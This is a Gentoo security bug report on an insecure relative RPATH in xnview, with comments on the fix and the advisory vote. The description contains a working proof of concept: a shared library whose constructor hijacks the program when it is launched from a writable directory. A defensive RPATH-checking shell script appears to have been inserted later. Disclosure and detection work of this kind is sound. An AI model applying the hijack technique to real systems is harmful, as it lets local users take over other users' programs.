Bug 117063 - x11-misc/xnview: insecure rpath
Summary: x11-misc/xnview: insecure rpath
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High normal
Assignee: Gentoo Security
URL:
Whiteboard: B3? [glsa]
Keywords:
Depends on:
Blocks: 81745
Reported: 2005-12-29 03:23 UTC by Tavis Ormandy (RETIRED)
Modified: 2005-12-30 04:54 UTC
Description Tavis Ormandy (RETIRED) gentoo-dev 2005-12-29 03:23:47 UTC
nelchael from desktop-misc herd reported that xnview includes a relative rpath, this means that should the application be launched from a directory other users have write access to, they can hijack the application.

$ chrpath /opt/bin/nview 
/opt/bin/nview: RPATH=.:/usr/local/lib:/usr/X11R6/lib
$ cd /tmp
$ /opt/bin/nview 
** NVIEW v4.16 Copyright 1991-2002 Pierre-E Gougelet (Feb 17 2004/13:47:38) **
...
$ cat > exploit.c 
#include <stdio.h>
#include <unistd.h>   /* _exit() */
void __attribute__((constructor)) evil (void)
{
        fprintf(stderr, "exploit code now in control.\n");
        _exit(0);
}
^D
$ gcc -fPIC -shared -o libformat.so exploit.c 
$ /opt/bin/nview 
exploit code now in control.

The package has been p.masked by desktop-misc, but may still need a glsa?

this could probably be fixed by using chrpath or patching the RPATH out in the ebuild, but this may violate some license agreement or something.
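A defender-side check for the class of problem in this report, added here as an example (not part of the bug, the xnview package or Gentoo's tooling): it splits an RPATH/RUNPATH value into its fields and flags every entry the dynamic loader resolves against the current working directory (".", an empty field, or any non-absolute path), which is exactly what let libformat.so in /tmp win above. It assumes readelf from binutils is installed and, as a policy choice, treats $ORIGIN-relative entries as acceptable because they resolve against the binary's own directory rather than the cwd.

```shell
#!/bin/sh
# rpath_insecure_entries RPATH_STRING
# Prints each cwd-relative entry, one per line ("(empty)" for an empty
# field), and returns 1 if any was found, 0 otherwise.
rpath_insecure_entries() {
    rest="$1"
    status=0
    [ -n "$rest" ] || return 0        # no RPATH at all: nothing to resolve
    rest="$rest:"                     # trailing ':' so the last field is read
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            "")         echo "(empty)"; status=1 ;;   # "" means cwd to ld.so
            /*)         ;;                            # absolute: fine lexically
            '$ORIGIN'*) ;;                            # relative to the binary
            *)          echo "$entry"; status=1 ;;    # ".", "lib", "../x", ...
        esac
    done
    return $status
}

# scan_binary PATH
# Extracts RPATH and RUNPATH from an ELF file with readelf (assumed to be
# installed) and runs the check above. Both tags are checked, joined by ':'.
scan_binary() {
    command -v readelf >/dev/null 2>&1 || { echo "readelf not found" >&2; return 2; }
    rpath=$(readelf -d "$1" 2>/dev/null |
            sed -n 's/.*(RPATH).*\[\(.*\)\]/\1/p; s/.*(RUNPATH).*\[\(.*\)\]/\1/p' |
            paste -sd: -)
    if rpath_insecure_entries "$rpath"; then
        echo "$1: rpath OK"
    else
        echo "$1: insecure rpath entries listed above (RPATH=$rpath)" >&2
        return 1
    fi
}
```

Run `scan_binary /opt/bin/nview` (or loop it over a directory of installed binaries) to get a non-zero exit status whenever a cwd-relative entry is present.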
Comment 1 Krzysztof Pawlik (RETIRED) gentoo-dev 2005-12-29 08:22:35 UTC
Got reply from Pierre-e Gougelet (author of Xnview):

--------
> Is it possible for us to
> modify the RPATH while installing the package - wouldn't it violate the
> licence?

No
--------
Comment 2 Krzysztof Pawlik (RETIRED) gentoo-dev 2005-12-29 08:52:35 UTC
Version 1.70-r1 which fixes this bug is in portage.
Comment 3 Stefan Cornelius (RETIRED) gentoo-dev 2005-12-29 13:39:17 UTC
arches, pls test and mark stable.
Comment 4 Krzysztof Pawlik (RETIRED) gentoo-dev 2005-12-29 13:53:18 UTC
x86 done. 1.70-r1 stable.
Comment 5 Stefan Cornelius (RETIRED) gentoo-dev 2005-12-29 14:25:05 UTC
mhhh ok, seems this is ready for glsa vote (is B3 ok here, anyways?). Also, as nelchael pointed out, ppc is probably not vulnerable, but I still want them to take a look while we continue the glsa process without waiting for them to stable.
Comment 6 Tavis Ormandy (RETIRED) gentoo-dev 2005-12-29 14:28:26 UTC
vote YES, pretty serious.
Comment 7 Sune Kloppenborg Jeppesen gentoo-dev 2005-12-29 22:44:48 UTC
We have a draft, let's have a GLSA, I vote yes.
Comment 8 Thierry Carrez (RETIRED) gentoo-dev 2005-12-30 04:54:33 UTC
GLSA 200512-18